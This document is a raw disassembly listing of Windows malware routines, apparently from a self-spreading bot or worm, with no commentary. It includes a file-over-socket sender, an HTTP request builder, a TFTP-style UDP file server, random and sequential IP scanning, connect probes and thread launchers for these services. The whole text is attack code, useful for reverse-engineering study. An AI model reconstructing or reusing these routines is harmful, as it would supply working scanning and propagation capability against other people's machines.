sub_405053 proc near ; CODE XREF: sub_404593+13C�p
var_404 = byte ptr -404h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 404h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov edi, 400h
mov [ebp+var_4], esi
call ds:off_42207C
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40510B
push esi
push ebx
call ds:off_422078
cmp eax, esi
mov [ebp+arg_4], eax
jz short loc_405104
loc_405098: ; CODE XREF: sub_405053+AF�j
push 400h
lea eax, [ebp+var_404]
push esi
push eax
call sub_415500
add esp, 0Ch
cmp edi, [ebp+arg_4]
jbe short loc_4050B5
mov edi, [ebp+arg_4]
loc_4050B5: ; CODE XREF: sub_405053+5D�j
mov eax, [ebp+arg_4]
push 2
neg eax
push esi
push eax
push ebx
call ds:off_42209C
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_404]
push edi
push eax
push ebx
call ds:off_422098
push esi
lea eax, [ebp+var_404]
push edi
push eax
push [ebp+arg_0]
call ds:dword_4364B8 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_4050FF
call ds:dword_4363FC ; WSAGetLastError
cmp eax, 2733h
jnz short loc_405104
xor eax, eax
loc_4050FF: ; CODE XREF: sub_405053+9B�j
sub [ebp+arg_4], eax
jnz short loc_405098
loc_405104: ; CODE XREF: sub_405053+43�j
; sub_405053+A8�j
push ebx
call ds:off_422074
loc_40510B: ; CODE XREF: sub_405053+30�j
pop edi
pop esi
pop ebx
leave
retn
sub_405053 endp
; =============== S U B R O U T I N E =======================================
sub_405110 proc near ; CODE XREF: sub_404716+181�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_415C80
test eax, eax
pop ecx
jbe short loc_405139
loc_405123: ; CODE XREF: sub_405110+27�j
cmp byte ptr [esi+edi], 5Ch
jnz short loc_40512D
mov byte ptr [esi+edi], 2Fh
loc_40512D: ; CODE XREF: sub_405110+17�j
push edi
inc esi
call sub_415C80
cmp esi, eax
pop ecx
jb short loc_405123
loc_405139: ; CODE XREF: sub_405110+11�j
mov eax, edi
pop edi
pop esi
retn
sub_405110 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40513E proc near ; CODE XREF: sub_40D2E0+2BE6�p
var_4A0 = byte ptr -4A0h
var_310 = byte ptr -310h
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A0h
push ebx
lea eax, [ebp+var_4A0]
push edi
push eax
push 101h
call ds:dword_4363E0 ; WSAStartup
push 6
push 1
push 2
call ds:dword_4364E8 ; socket
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_415500
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_14]
call ds:dword_436468 ; htons
push [ebp+arg_10]
mov [ebp+var_E], ax
call sub_409410
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call ds:dword_436410 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_40521B
mov eax, [ebp+arg_20]
cmp eax, edi
jnz short loc_4051B7
mov eax, offset byte_4325D8
loc_4051B7: ; CODE XREF: sub_40513E+72�j
push esi
mov esi, 100h
push [ebp+arg_10]
push eax
lea eax, [ebp+var_110]
push [ebp+arg_1C]
push [ebp+arg_18]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push esi
push eax
call sub_4159FA
add esp, 1Ch
lea eax, [ebp+var_110]
push edi
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_110]
push eax
push ebx
call ds:dword_4364B8 ; send
push esi
lea eax, [ebp+var_110]
push edi
push eax
call sub_415560
add esp, 0Ch
lea eax, [ebp+var_110]
push edi
push esi
push eax
push ebx
call ds:dword_436480 ; recv
pop esi
loc_40521B: ; CODE XREF: sub_40513E+6B�j
push ebx
call ds:dword_436500 ; closesocket
call ds:dword_4363C8 ; WSACleanup
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_310]
push eax
call sub_415480
cmp [ebp+arg_C], edi
pop ecx
pop ecx
jnz short loc_40525B
push edi
lea eax, [ebp+var_310]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 14h
loc_40525B: ; CODE XREF: sub_40513E+102�j
pop edi
pop ebx
leave
retn
sub_40513E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40525F proc near ; CODE XREF: sub_40525F:loc_40574A�p
; DATA XREF: sub_405898+107�o ...
var_884 = dword ptr -884h
var_880 = dword ptr -880h
var_780 = byte ptr -780h
var_580 = byte ptr -580h
var_57F = byte ptr -57Fh
var_57E = byte ptr -57Eh
var_57D = byte ptr -57Dh
var_57C = byte ptr -57Ch
var_37C = dword ptr -37Ch
var_378 = byte ptr -378h
var_274 = byte ptr -274h
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = byte ptr -164h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_D8 = byte ptr -0D8h
var_D7 = byte ptr -0D7h
var_D6 = byte ptr -0D6h
var_D5 = byte ptr -0D5h
var_58 = byte ptr -58h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 884h
push ebx
push esi
push edi
mov edx, [ebp+arg_0]
mov esi, offset aOctet ; "octet"
lea edi, [ebp+var_1C]
movsd
push 1
xor ebx, ebx
movsw
pop eax
mov ecx, 0A9h
mov esi, edx
lea edi, [ebp+var_37C]
push ebx
push 2
rep movsd
inc [ebp+var_16C]
push 2
mov [ebp+var_C], eax
mov [edx+2A0h], eax
call ds:dword_4364E8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_10], edi
jnz short loc_405322
push 190h
call ds:dword_422054 ; Sleep
call ds:dword_4363FC ; WSAGetLastError
push eax
lea eax, [ebp+var_780]
push offset unk_4265AC
push eax
call sub_415480
add esp, 0Ch
cmp [ebp+var_E0], ebx
jnz short loc_405302
push ebx
lea eax, [ebp+var_780]
push [ebp+var_E4]
push eax
lea eax, [ebp+var_164]
push eax
push [ebp+var_37C]
call sub_40BAE7
add esp, 14h
loc_405302: ; CODE XREF: sub_40525F+7E�j
lea eax, [ebp+var_780]
push eax
call sub_40A5B3
push [ebp+var_170]
call sub_415248
pop ecx
pop ecx
push ebx
call ds:dword_422044 ; ExitThread
loc_405322: ; CODE XREF: sub_40525F+50�j
mov eax, [ebp+var_170]
push 10h
imul eax, 234h
push ebx
mov ds:dword_43BECC[eax], edi
lea eax, [ebp+var_44]
push eax
call sub_415500
add esp, 0Ch
mov [ebp+var_44], 2
push [ebp+var_168]
call ds:dword_436468 ; htons
mov [ebp+var_42], ax
lea eax, [ebp+var_44]
push 10h
push eax
push edi
mov [ebp+var_40], ebx
call ds:dword_436494 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_405387
push 1388h
call ds:dword_422054 ; Sleep
dec [ebp+var_16C]
push [ebp+arg_0]
jmp loc_40574A
; ---------------------------------------------------------------------------
loc_405387: ; CODE XREF: sub_40525F+10D�j
lea eax, [ebp+var_378]
push offset aRb ; "rb"
push eax
call sub_415B78
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jnz short loc_405405
push 190h
call ds:dword_422054 ; Sleep
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_780]
push offset unk_426578
push eax
call sub_415480
push ebx
lea eax, [ebp+var_780]
push [ebp+var_E4]
push eax
lea eax, [ebp+var_164]
push eax
push [ebp+var_37C]
call sub_40BAE7
lea eax, [ebp+var_780]
push eax
call sub_40A5B3
push [ebp+var_170]
call sub_415248
add esp, 28h
push ebx
call ds:dword_422044 ; ExitThread
loc_405405: ; CODE XREF: sub_40525F+140�j
mov esi, 200h
loc_40540A: ; CODE XREF: sub_40525F+4A5�j
mov eax, [ebp+arg_0]
cmp [eax+2A0h], ebx
jz loc_40570A
mov [ebp+var_880], edi
mov edi, 80h
push edi
lea eax, [ebp+var_D8]
push ebx
push eax
mov [ebp+var_34], 5
mov [ebp+var_30], 1388h
mov [ebp+var_884], 1
call sub_415500
add esp, 0Ch
lea eax, [ebp+var_34]
push eax
push ebx
lea eax, [ebp+var_884]
push ebx
push eax
push ebx
call ds:dword_436450 ; select
test eax, eax
jle loc_4056FE
mov al, ds:byte_4325D8
mov ecx, edi
mov [ebp+var_580], al
xor eax, eax
lea edi, [ebp+var_57F]
mov [ebp+var_4], 10h
rep stosd
stosw
stosb
mov edi, [ebp+var_10]
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_2C]
push eax
push ebx
lea eax, [ebp+var_D8]
push 80h
push eax
push edi
call ds:dword_436440 ; recvfrom
push [ebp+var_28]
mov [ebp+var_C], eax
call ds:dword_4364F4 ; inet_ntoa
push eax
lea eax, [ebp+var_58]
push eax
call sub_415480
cmp [ebp+var_D8], bl
pop ecx
pop ecx
jnz loc_4056E8
cmp [ebp+var_D7], 1
jnz loc_405634
lea eax, [ebp+var_274]
push eax
call sub_415C80
lea eax, [ebp+eax+var_D5]
mov [ebp+var_14], eax
lea eax, [ebp+var_274]
push eax
call sub_415C80
push eax
lea eax, [ebp+var_D6]
push eax
lea eax, [ebp+var_274]
push eax
call sub_416EC0
add esp, 14h
test eax, eax
jnz loc_4055EE
lea eax, [ebp+var_1C]
push eax
call sub_415C80
push eax
lea eax, [ebp+var_1C]
push [ebp+var_14]
push eax
call sub_416EC0
add esp, 10h
test eax, eax
jnz loc_4055EE
push ebx
push ebx
push [ebp+var_8]
call sub_416E2E
push [ebp+var_8]
lea eax, [ebp+var_57C]
mov [ebp+var_580], bl
mov [ebp+var_57F], 3
push esi
push 1
push eax
mov [ebp+var_57E], bl
mov [ebp+var_57D], 1
call sub_416BA7
add esp, 1Ch
lea ecx, [ebp+var_2C]
mov [ebp+var_C], eax
add eax, 4
push [ebp+var_4]
push ecx
push ebx
push eax
lea eax, [ebp+var_580]
push eax
push edi
call ds:dword_4364CC ; sendto
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_58]
push eax
push offset dword_426530
loc_4055A2: ; CODE XREF: sub_40525F+484�j
lea eax, [ebp+var_780]
push eax
call sub_415480
add esp, 10h
cmp [ebp+var_E0], ebx
jnz short loc_4055DC
push ebx
lea eax, [ebp+var_780]
push [ebp+var_E4]
push eax
lea eax, [ebp+var_164]
push eax
push [ebp+var_37C]
call sub_40BAE7
add esp, 14h
loc_4055DC: ; CODE XREF: sub_40525F+358�j
lea eax, [ebp+var_780]
push eax
call sub_40A5B3
pop ecx
jmp loc_4056FE
; ---------------------------------------------------------------------------
loc_4055EE: ; CODE XREF: sub_40525F+2B6�j
; sub_40525F+2D7�j
push [ebp+var_4]
lea eax, [ebp+var_2C]
push eax
push ebx
push 13h
push offset dword_42651C
push edi
call ds:dword_4364CC ; sendto
lea eax, [ebp+var_274]
push eax
lea eax, [ebp+var_58]
push eax
lea eax, [ebp+var_D8]
push offset unk_4264E8
push eax
call sub_415480
lea eax, [ebp+var_D8]
push eax
call sub_40A5B3
add esp, 14h
jmp loc_4056FE
; ---------------------------------------------------------------------------
loc_405634: ; CODE XREF: sub_40525F+275�j
cmp [ebp+var_D7], 4
jnz loc_4056E8
mov cl, [ebp+var_D5]
mov al, [ebp+var_D6]
cmp cl, 0FFh
mov [ebp+var_580], bl
mov [ebp+var_57F], 3
jnz short loc_405671
inc al
xor cl, cl
mov [ebp+var_57E], al
mov [ebp+var_57D], bl
jmp short loc_40567F
; ---------------------------------------------------------------------------
loc_405671: ; CODE XREF: sub_40525F+3FE�j
inc cl
mov [ebp+var_57E], al
mov [ebp+var_57D], cl
loc_40567F: ; CODE XREF: sub_40525F+410�j
movzx eax, al
movzx ecx, cl
shl eax, 8
add eax, ecx
push ebx
shl eax, 9
sub eax, esi
push eax
push [ebp+var_8]
call sub_416E2E
push [ebp+var_8]
lea eax, [ebp+var_57C]
push esi
push 1
push eax
call sub_416BA7
add esp, 1Ch
mov edi, eax
lea eax, [ebp+var_2C]
mov [ebp+var_C], edi
push [ebp+var_4]
push eax
lea eax, [edi+4]
push ebx
push eax
lea eax, [ebp+var_580]
push eax
push [ebp+var_10]
call ds:dword_4364CC ; sendto
cmp edi, ebx
jnz short loc_4056FE
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_58]
push eax
push offset dword_426494
jmp loc_4055A2
; ---------------------------------------------------------------------------
loc_4056E8: ; CODE XREF: sub_40525F+268�j
; sub_40525F+3DC�j
push [ebp+var_4]
lea eax, [ebp+var_2C]
push eax
push ebx
push 9
push offset dword_426488
push edi
call ds:dword_4364CC ; sendto
loc_4056FE: ; CODE XREF: sub_40525F+204�j
; sub_40525F+38A�j ...
cmp [ebp+var_C], ebx
mov edi, [ebp+var_10]
jg loc_40540A
loc_40570A: ; CODE XREF: sub_40525F+1B4�j
push edi
call ds:dword_436500 ; closesocket
push [ebp+var_8]
call sub_415AD0
mov esi, [ebp+arg_0]
dec [ebp+var_16C]
pop ecx
cmp [esi+2A0h], ebx
jnz short loc_40573E
push [ebp+var_170]
call sub_415248
pop ecx
push ebx
call ds:dword_422044 ; ExitThread
loc_40573E: ; CODE XREF: sub_40525F+4CA�j
push 3E8h
call ds:dword_422054 ; Sleep
push esi
loc_40574A: ; CODE XREF: sub_40525F+123�j
call sub_40525F
pop edi
pop esi
pop ebx
leave
retn 4
sub_40525F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405756 proc near ; CODE XREF: sub_40D2E0+5D3F�p
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+var_200]
push offset unk_42684C
push eax
xor ebx, ebx
call sub_415480
cmp ds:dword_426620, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_4057C4
push esi
mov esi, offset dword_426628
loc_405789: ; CODE XREF: sub_405756+6B�j
mov eax, [esi]
add ebx, eax
push eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+var_400]
push offset aSD ; " %s: %d,"
push eax
call sub_415480
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_416F00
add esi, 3Ch
add esp, 1Ch
cmp dword ptr [esi-8], 0
jnz short loc_405789
pop esi
loc_4057C4: ; CODE XREF: sub_405756+2B�j
push ds:dword_4C8CC0
call sub_409D67
pop ecx
push eax
push ebx
lea eax, [ebp+var_400]
push offset aTotalDInS_ ; " Total: %d in %s."
push eax
call sub_415480
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_416F00
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
lea eax, [ebp+var_200]
push eax
call sub_40A5B3
add esp, 34h
pop edi
pop ebx
leave
retn
sub_405756 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405821 proc near ; CODE XREF: sub_40D2E0+56B3�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 8
call sub_415174
test eax, eax
pop ecx
jle short loc_40585D
mov eax, [ebp+arg_C]
push ds:dword_4325E8[eax*8]
call ds:dword_4364F4 ; inet_ntoa
push eax
lea eax, [ebp+var_200]
push offset unk_4268B0
push eax
call sub_415480
add esp, 0Ch
jmp short loc_405870
; ---------------------------------------------------------------------------
loc_40585D: ; CODE XREF: sub_405821+13�j
lea eax, [ebp+var_200]
push offset unk_426880
push eax
call sub_415480
pop ecx
pop ecx
loc_405870: ; CODE XREF: sub_405821+3A�j
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
lea eax, [ebp+var_200]
push eax
call sub_40A5B3
add esp, 18h
leave
retn
sub_405821 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405898 proc near ; CODE XREF: sub_405FC5+4F�p
var_210 = dword ptr -210h
var_204 = byte ptr -204h
var_4 = byte ptr -4
arg_10 = byte ptr 18h
arg_90 = byte ptr 98h
arg_110 = dword ptr 118h
arg_130 = dword ptr 138h
arg_138 = dword ptr 140h
arg_13C = dword ptr 144h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+arg_130]
push ebx
cmp eax, 0FFFFFFFFh
push esi
jz loc_405C28
imul eax, 3Ch
xor ebx, ebx
cmp ds:dword_42662C[eax], ebx
jz loc_405B09
push 4
call sub_415174
test eax, eax
pop ecx
jnz loc_405C28
mov eax, ds:dword_42ACC4
push edi
mov edi, offset dword_434604
push 104h
push edi
push ebx
mov ds:dword_434814, eax
mov ds:dword_434810, ebx
call ds:off_422060
push 103h
mov esi, offset dword_434708
push offset byte_42AD8C
push esi
call sub_416D30
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov ds:dword_434600, eax
mov eax, [ebp+arg_138]
push 7Fh
mov ds:dword_434898, eax
jnz short loc_40594B
lea eax, [ebp+arg_10]
push eax
push offset dword_434818
call sub_416D30
add esp, 0Ch
mov ds:dword_43489C, 1
jmp short loc_405965
; ---------------------------------------------------------------------------
loc_40594B: ; CODE XREF: sub_405898+94�j
lea eax, [ebp+arg_90]
push eax
push offset dword_434818
call sub_416D30
add esp, 0Ch
mov ds:dword_43489C, ebx
loc_405965: ; CODE XREF: sub_405898+B1�j
push esi
push edi
push ds:dword_434814
lea eax, [ebp+var_204]
push offset unk_426A40
push eax
call sub_415480
push ebx
lea eax, [ebp+var_204]
push 4
push eax
call sub_414F2C
add esp, 20h
mov ds:dword_43480C, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_434600
push offset sub_40525F
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, ds:dword_43480C
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_4059D4
loc_4059C2: ; CODE XREF: sub_405898+13A�j
cmp ds:dword_4348A0, ebx
jnz short loc_4059EF
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_4059C2
; ---------------------------------------------------------------------------
loc_4059D4: ; CODE XREF: sub_405898+128�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset unk_426A00
push eax
call sub_415480
add esp, 0Ch
loc_4059EF: ; CODE XREF: sub_405898+130�j
lea eax, [ebp+var_204]
push eax
call sub_40A5B3
mov edi, offset dword_434C5C
mov [esp+210h+var_210], 104h
push edi
push ebx
mov ds:dword_434E68, ebx
call ds:off_422060
push 103h
mov esi, offset dword_434D60
push offset byte_42AD8C
push esi
call sub_416D30
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov ds:dword_434C58, eax
mov eax, [ebp+arg_138]
push 7Fh
mov ds:dword_434EF0, eax
jnz short loc_405A6A
lea eax, [ebp+arg_10]
push eax
push offset dword_434E70
call sub_416D30
add esp, 0Ch
mov ds:dword_434EF4, 1
jmp short loc_405A84
; ---------------------------------------------------------------------------
loc_405A6A: ; CODE XREF: sub_405898+1B3�j
lea eax, [ebp+arg_90]
push eax
push offset dword_434E70
call sub_416D30
add esp, 0Ch
mov ds:dword_434EF4, ebx
loc_405A84: ; CODE XREF: sub_405898+1D0�j
push esi
push edi
push ds:dword_434E6C
lea eax, [ebp+var_204]
push offset dword_4269B0
push eax
call sub_415480
push ebx
lea eax, [ebp+var_204]
push 5
push eax
call sub_414F2C
add esp, 20h
mov ds:dword_434E64, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_434C58
push offset sub_403A1B
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, ds:dword_434E64
pop edi
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_405AF8
loc_405AE2: ; CODE XREF: sub_405898+25E�j
cmp ds:dword_434EF8, ebx
jnz loc_405C1B
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_405AE2
; ---------------------------------------------------------------------------
loc_405AF8: ; CODE XREF: sub_405898+248�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset dword_426970
jmp loc_405C0C
; ---------------------------------------------------------------------------
loc_405B09: ; CODE XREF: sub_405898+25�j
cmp ds:dword_426630[eax], ebx
jz loc_405C28
push 3
call sub_415174
test eax, eax
pop ecx
jnz loc_405C28
mov esi, offset dword_434B34
push 104h
push esi
push ebx
call ds:off_422060
push 5Ch
push esi
call sub_417030
pop ecx
cmp eax, ebx
pop ecx
jz short loc_405B47
mov [eax], bl
loc_405B47: ; CODE XREF: sub_405898+2AB�j
mov eax, ds:dword_42ACC8
mov ds:dword_434C4C, ebx
mov ds:dword_434C38, eax
lea eax, [ebp+arg_10]
push eax
push offset dword_4348AC
call sub_415480
mov eax, [ebp+arg_110]
pop ecx
pop ecx
mov ds:dword_4348A8, eax
mov ecx, [ebp+arg_138]
push esi
push ds:dword_434C38
mov ds:dword_434C44, ecx
mov ecx, [ebp+arg_13C]
push eax
mov ds:dword_434C48, ecx
call sub_409526
pop ecx
push eax
lea eax, [ebp+var_204]
push offset unk_426924
push eax
call sub_415480
push ebx
lea eax, [ebp+var_204]
push 3
push eax
call sub_414F2C
add esp, 20h
mov ds:dword_434C40, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4348A8
push offset sub_404138
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, ds:dword_434C40
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_405C00
loc_405BEE: ; CODE XREF: sub_405898+366�j
cmp ds:dword_434C54, ebx
jnz short loc_405C1B
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_405BEE
; ---------------------------------------------------------------------------
loc_405C00: ; CODE XREF: sub_405898+354�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset unk_4268E0
loc_405C0C: ; CODE XREF: sub_405898+26C�j
lea eax, [ebp+var_204]
push eax
call sub_415480
add esp, 0Ch
loc_405C1B: ; CODE XREF: sub_405898+250�j
; sub_405898+35C�j
lea eax, [ebp+var_204]
push eax
call sub_40A5B3
pop ecx
loc_405C28: ; CODE XREF: sub_405898+14�j
; sub_405898+35�j ...
pop esi
pop ebx
leave
retn
sub_405898 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405C2C proc near ; CODE XREF: sub_405DAD:loc_405E1E�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
push 4
lea esi, ds:4325E8h[eax*8]
lea eax, [ebp+arg_0]
push esi
push eax
call sub_415560
add esp, 0Ch
push [ebp+arg_0]
call ds:dword_43639C ; htonl
inc eax
push eax
mov [ebp+arg_0], eax
call ds:dword_436464 ; htonl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
push esi
call sub_415560
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
sub_405C2C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405C74 proc near ; CODE XREF: sub_405DAD+69�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
or esi, 0FFFFFFFFh
push [ebp+arg_0]
mov [ebp+var_C], esi
mov [ebp+var_8], esi
mov [ebp+var_4], esi
mov [ebp+var_10], esi
call sub_415C80
cmp eax, 0Fh
pop ecx
jbe short loc_405C9C
xor eax, eax
jmp short loc_405D0D
; ---------------------------------------------------------------------------
loc_405C9C: ; CODE XREF: sub_405C74+22�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+arg_0]
call sub_416A97
add esp, 18h
cmp [ebp+var_C], esi
jnz short loc_405CC9
call sub_4154DC
mov [ebp+var_C], eax
loc_405CC9: ; CODE XREF: sub_405C74+4B�j
cmp [ebp+var_8], esi
jnz short loc_405CD6
call sub_4154DC
mov [ebp+var_8], eax
loc_405CD6: ; CODE XREF: sub_405C74+58�j
cmp [ebp+var_4], esi
jnz short loc_405CE3
call sub_4154DC
mov [ebp+var_4], eax
loc_405CE3: ; CODE XREF: sub_405C74+65�j
mov eax, [ebp+var_10]
cmp eax, esi
jnz short loc_405CEF
call sub_4154DC
loc_405CEF: ; CODE XREF: sub_405C74+74�j
shl eax, 8
add eax, [ebp+var_4]
mov ecx, [ebp+var_C]
shl eax, 8
add eax, [ebp+var_8]
shl eax, 8
add eax, ecx
mov ecx, [ebp+arg_4]
mov ds:dword_4325E8[ecx*8], eax
loc_405D0D: ; CODE XREF: sub_405C74+26�j
pop esi
leave
retn
sub_405C74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405D10 proc near ; CODE XREF: sub_405DAD+BB�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
push 1
pop edi
xor ebx, ebx
push ebx
push edi
push 2
mov [ebp+var_4], edi
call ds:dword_4364E8 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_405D39
xor eax, eax
jmp short loc_405DA8
; ---------------------------------------------------------------------------
loc_405D39: ; CODE XREF: sub_405D10+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call ds:dword_436468 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call ds:dword_436504 ; ioctlsocket
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call ds:dword_436410 ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_8], ebx
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_120]
push ebx
push eax
push ebx
push ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call ds:dword_436450 ; select
push esi
mov edi, eax
call ds:dword_436500 ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_405DA8: ; CODE XREF: sub_405D10+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_405D10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405DAD proc near ; DATA XREF: sub_405FC5+13B�o
var_2A8 = dword ptr -2A8h
var_28C = byte ptr -28Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_1F8 = byte ptr -1F8h
var_178 = byte ptr -178h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_150 = byte ptr -150h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_150]
rep movsd
mov esi, [ebp+var_2C]
mov dword ptr [eax+148h], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], esi
mov [ebp+arg_0], eax
call ds:dword_422048 ; GetTickCount
push eax
call sub_4154D2
mov ebx, esi
pop ecx
imul ebx, 234h
loc_405DF4: ; CODE XREF: sub_405DAD+204�j
mov eax, ds:dword_43BEC4[ebx]
cmp ds:dword_4325EC[eax*8], 0
jz loc_405FB6
cmp [ebp+var_10], 0
push eax
jz short loc_405E1E
lea eax, [ebp+var_150]
push eax
call sub_405C74
pop ecx
jmp short loc_405E23
; ---------------------------------------------------------------------------
loc_405E1E: ; CODE XREF: sub_405DAD+60�j
call sub_405C2C
loc_405E23: ; CODE XREF: sub_405DAD+6F�j
pop ecx
mov edi, eax
push [ebp+arg_0]
push ds:dword_43BEC4[ebx]
push [ebp+var_3C]
push edi
call ds:dword_4364F4 ; inet_ntoa
push eax
